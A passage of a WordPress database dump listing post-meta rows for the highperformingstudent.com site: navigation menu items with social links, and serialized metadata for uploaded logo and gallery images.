41,22,'_menu_item_xfn',''),(42,22,'_menu_item_url','http://highperformingstudent.com/start'),(43,23,'_menu_item_type','post_type'),(44,23,'_menu_item_menu_item_parent','0'),(45,23,'_menu_item_object_id','7'),(46,23,'_menu_item_object','page'),(47,23,'_menu_item_target',''),(48,23,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49,23,'_menu_item_xfn',''),(50,23,'_menu_item_url',''),(59,25,'_menu_item_type','post_type'),(60,25,'_menu_item_menu_item_parent','0'),(61,25,'_menu_item_object_id','8'),(62,25,'_menu_item_object','page'),(63,25,'_menu_item_target',''),(64,25,'_menu_item_classes','a:1:{i:0;s:9:\"login-now\";}'),(65,25,'_menu_item_xfn',''),(66,25,'_menu_item_url',''),(67,26,'_menu_item_type','custom'),(68,26,'_menu_item_menu_item_parent','0'),(69,26,'_menu_item_object_id','26'),(70,26,'_menu_item_object','custom'),(71,26,'_menu_item_target',''),(72,26,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(73,26,'_menu_item_xfn',''),(74,26,'_menu_item_url','http://highperformingstudent.com/'),(75,27,'_menu_item_type','post_type'),(76,27,'_menu_item_menu_item_parent','0'),(77,27,'_menu_item_object_id','7'),(78,27,'_menu_item_object','page'),(79,27,'_menu_item_target',''),(80,27,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(81,27,'_menu_item_xfn',''),(82,27,'_menu_item_url',''),(83,28,'_menu_item_type','post_type'),(84,28,'_menu_item_menu_item_parent','0'),(85,28,'_menu_item_object_id','9'),(86,28,'_menu_item_object','page'),(87,28,'_menu_item_target',''),(88,28,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(89,28,'_menu_item_xfn',''),(90,28,'_menu_item_url',''),(91,29,'_menu_item_type','post_type'),(92,29,'_menu_item_menu_item_parent','0'),(93,29,'_menu_item_object_id','8'),(94,29,'_menu_item_object','page'),(95,29,'_menu_item_target',''),(96,29,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(97,29,'_menu_item_xfn',''),(98,29,'_menu_item_url',''),(99,30,'_menu_item_type','custom'),(100,30,'_menu_item_menu_item_parent','0'),(101,30,'_menu_item_object_id','30'),(102,30,'_menu_item_object','custom'),(103,30,'_menu_item_target',''),(104,30,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(105,30,'_menu_item_xfn',''),(106,30,'_menu_item_url','https://www.yelp.com'),(107,31,'_menu_item_type','custom'),(108,31,'_menu_item_menu_item_parent','0'),(109,31,'_menu_item_object_id','31'),(110,31,'_menu_item_object','custom'),(111,31,'_menu_item_target',''),(112,31,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(113,31,'_menu_item_xfn',''),(114,31,'_menu_item_url','https://www.facebook.com/wordpress'),(115,32,'_menu_item_type','custom'),(116,32,'_menu_item_menu_item_parent','0'),(117,32,'_menu_item_object_id','32'),(118,32,'_menu_item_object','custom'),(119,32,'_menu_item_target',''),(120,32,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(121,32,'_menu_item_xfn',''),(122,32,'_menu_item_url','https://twitter.com/wordpress'),(123,33,'_menu_item_type','custom'),(124,33,'_menu_item_menu_item_parent','0'),(125,33,'_menu_item_object_id','33'),(126,33,'_menu_item_object','custom'),(127,33,'_menu_item_target',''),(128,33,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(129,33,'_menu_item_xfn',''),(130,33,'_menu_item_url','https://www.instagram.com/explore/tags/wordcamp/'),(131,34,'_menu_item_type','custom'),(132,34,'_menu_item_menu_item_parent','0'),(133,34,'_menu_item_object_id','34'),(134,34,'_menu_item_object','custom'),(135,34,'_menu_item_target',''),(136,34,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(137,34,'_menu_item_xfn',''),(138,34,'_menu_item_url','mailto:wordpress@example.com'),(1414,2034,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:272;s:6:\"height\";i:64;s:4:\"file\";s:35:\"2020/10/imageedit_18_8930195226.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"imageedit_18_8930195226-150x64.png\";s:5:\"width\";i:150;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"imageedit_18_8930195226-100x64.png\";s:5:\"width\";i:100;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1413,2034,'_wp_attached_file','2020/10/imageedit_18_8930195226.png'),(145,37,'_wp_attached_file','2020/10/HPS_Color_White-Text.png'),(146,37,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:288;s:6:\"height\";i:144;s:4:\"file\";s:32:\"2020/10/HPS_Color_White-Text.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"HPS_Color_White-Text-150x144.png\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"HPS_Color_White-Text-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1652,2120,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:289;s:6:\"height\";i:144;s:4:\"file\";s:36:\"2020/12/HPS_Color_Black-Text.png.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"HPS_Color_Black-Text.png-150x144.png\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:36:\"HPS_Color_Black-Text.png-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151,43,'_wp_attached_file','2020/10/log_file_2020-10-28__13-45-52.txt'),(152,521,'_wp_attached_file','2014/07/012.jpg'),(153,521,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1150;s:6:\"height\";i:800;s:4:\"file\";s:15:\"2014/07/012.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"012-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"012-1024x712.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:712;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"012-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"012-768x534.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"012-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"012-1150x500.jpg\";s:5:\"width\";i:1150;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"012-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"012-880x612.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:612;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"012-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"012-450x313.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:313;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"012-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154,522,'_wp_attached_file','2014/07/022.jpg'),(155,522,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:517;s:6:\"height\";i:536;s:4:\"file\";s:15:\"2014/07/022.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"022-289x300.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"022-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"022-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"022-517x500.jpg\";s:5:\"width\";i:517;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"022-517x380.jpg\";s:5:\"width\";i:517;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"022-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"022-450x467.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:467;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"022-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156,523,'_wp_attached_file','2014/07/032.jpg'),(157,523,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:672;s:4:\"file\";s:15:\"2014/07/032.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"032-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"032-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"032-768x573.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:573;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"032-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"032-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"032-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"032-880x657.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"032-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"032-450x336.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"032-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(158,524,'_wp_attached_file','2014/07/042.jpg'),(159,524,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:660;s:4:\"file\";s:15:\"2014/07/042.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"042-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"042-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"042-768x563.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:563;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"042-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"042-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"042-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"042-880x645.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"042-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"042-450x330.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:330;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"042-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160,525,'_wp_attached_file','2014/07/051.jpg'),(161,525,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:675;s:4:\"file\";s:15:\"2014/07/051.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"051-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"051-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"051-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"051-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"051-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"051-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"051-880x660.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"051-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"051-450x338.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"051-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162,526,'_wp_attached_file','2014/07/061.jpg'),(163,526,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:630;s:6:\"height\";i:441;s:4:\"file\";s:15:\"2014/07/061.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"061-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"061-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"061-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"061-630x380.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"061-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"061-450x315.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"061-450x441.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:441;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(164,527,'_wp_attached_file','2014/07/071.jpg'),(165,527,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:545;s:4:\"file\";s:15:\"2014/07/071.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"071-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"071-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"071-768x465.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"071-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"071-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"071-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"071-880x533.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"071-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"071-450x273.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"071-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166,528,'_wp_attached_file','2014/07/081.jpg'),(167,528,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:610;s:4:\"file\";s:15:\"2014/07/081.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"081-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"081-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"081-768x521.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:521;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"081-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"081-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"081-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"081-880x596.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:596;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"081-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"081-450x305.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:305;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"081-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168,529,'_wp_attached_file','2014/07/091.jpg'),(169,529,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:800;s:4:\"file\";s:15:\"2014/07/091.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"091-300x234.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"091-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"091-768x600.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"091-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"091-1024x500.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"091-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"091-880x688.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:688;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"091-450x350.jpg\";s:5:\"widt